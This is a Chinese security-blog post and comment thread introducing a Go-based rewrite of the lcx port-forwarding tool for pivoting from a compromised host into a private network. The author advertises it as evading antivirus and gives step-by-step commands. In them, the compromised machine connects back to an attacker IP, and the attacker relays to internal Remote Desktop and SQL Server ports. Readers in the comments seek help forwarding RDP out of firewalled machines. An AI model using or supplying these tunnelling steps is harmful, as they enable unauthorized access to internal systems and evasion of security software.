经常有朋友使用lcx,但是由于很多原因可能lcx都不好使,例如下面几点:
1、linux下不支持lcx,这时只能拿msf出来;
2、不免杀;
3、每次内网要重新连接其他主机的时候,都必须重新进去并重新敲打命令 ,并且操作过多时容易被发现。
最近正好上面那些问题都碰上了,于是没办法就使用golang自己写了一个。我写的这个lcx有以下几个特点:
1、golang程序跨平台性,甚至嵌入式Linux都支持;
2、免杀,基本上目前golang程序都不会被识别为病毒;
3、肉鸡只需操作一次,其他的都交给主控端操作。
该工具运行界面如下所示:
为了讲解该工具的功能和使用方法,以下列场景展开介绍:
前提介绍:
网络拓扑如上图所示,内网私有,外网无法直接访问内网任意主机,但其中A已经控制了B。
实现目标:
攻击者A通过B 连接内网中任意一台计算机(如远程桌面,数据库等)。
第一步: 在B上面输入指令:
lcx 111.13.100.92 123
第二步:假如 A 想连接内网中 C 的远程桌面,那么在A上输入指令:
lcx 456 123 192.168.10.3 3389
这时, A 只用连接本机的456端口就等于连接内网C的3389端口了。
第一步,在B上输入指令:
lcx 111.13.100.92 123
第二步,在A上输入指令:
lcx 1433 123 192.168.10.55 1433
这时,A只用连接本机1433端口就等于连接内网中(192.168.10.55)的1433端口了。
暂时只提供windows版本:lcx._g
【本文由Yatere投稿,安全脉搏PulseO0O整理发布】
本文作者:PulseO0O
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/6341.html
端口转发吗,现在主要适用meterpreter的portfwd,不过先收了
比lcx灵活一些。
测试下载30MB文件崩溃
@蒂娜 我们会通知作者关于这个bug以便进行修复 多谢测试
请教一下,如果我就拿下了一台机器,他却有防火墙,我无法连接他的3389端口,需要把他的3389端口转发出来,应该怎么做?
你说这个早就有了,只不过每人发出来。lcx确实不够灵活,但是体积比较小,压缩后在8K。不知道你这个go版本有多大。
不错,正需要这样的工具,lcx真TNND蛋疼 每次用它都是登录进去就卡死 无论网速多快的情况下都是如此。msf的portfwd虽然好用 但是在我服务器的kali2虚拟机里转发端口就不好用了 因为虚拟机处于内网 要物理机映射端口 portfwd不能再外网IP直接绑定端口 所以转发不了。搜半天了没找到能用的 试试你这个,先收下了 谢谢了!
嘿,哥们。 我怎么看不明白呢? 场景1的IP地址是什么呢? 我本机执行lcx._g.exe xx.xx.xx.xx 666,然后肉鸡执行lcx._g.exe 456 666 内网ip 3389,怎么不行呢?
请问出现exchange over 链接中断咋办?
好像附件下载不了了?!
@haige 没有问题 可以下载
留名
如果A直接想连B 该怎么决解 老实说真不会用
lcx 123 456 192.168.10.3 3389
如果A直接连接B呢?不会使
我测试了下,转发不起,登录3389报协议错误
测试了2台,没有成功???连接报协议错误!
这个程序的源码可发布出来供学习下吗? 谢谢
D:\tool>lcx._g.exe 123 192.168.128.18 3389
123 3389 192.168.128.18
2016/05/26 00:19:57 portforward listen on 123
2016/05/26 00:21:23 remote dial failed: dial tcp 192.168.128.18:3389: ConnectEx
tcp: A connection attempt failed because the connected party did not properly re
spond after a period of time, or established connection failed because connected
host has failed to respond.
panic: runtime error: invalid memory address or nil pointer dereference
[signal 0xc0000005 code=0x0 addr=0x14 pc=0x401c44]
goroutine 1 [running]:
main.main()
F:/golang/src/lcx/main.go:78 +0xc44
被360完美查杀
请问Linux版本什么时间分享?
A连接B的话,真tm不会用,感觉贼鸡肋
转发b的3389出来怎么操作呢?我测试报错。错误格式和这个一样,求解
D:\tool>lcx._g.exe 123 192.168.128.18 3389
123 3389 192.168.128.18
2016/05/26 00:19:57 portforward listen on 123
2016/05/26 00:21:23 remote dial failed: dial tcp 192.168.128.18:3389: ConnectEx
tcp: A connection attempt failed because the connected party did not properly re
spond after a period of time, or established connection failed because connected
host has failed to respond.
panic: runtime error: invalid memory address or nil pointer dereference
[signal 0xc0000005 code=0x0 addr=0x14 pc=0x401c44]
goroutine 1 [running]:
main.main()
F:/golang/src/lcx/main.go:78 +0xc44
@123 lcx._g.exe 456 123 192.168.128.18 3389 这时, A 只用连接本机的456端口就等于连接内网C的3389端口了。
linux版本的呢 64位的 有木有
A 机为什么还要 设置 内网机的 192.x.x.x IP? ,直接内网机发一个socket到A机不就OK了?
无意吐槽,用惯了lcx,这个一时半会真不好使。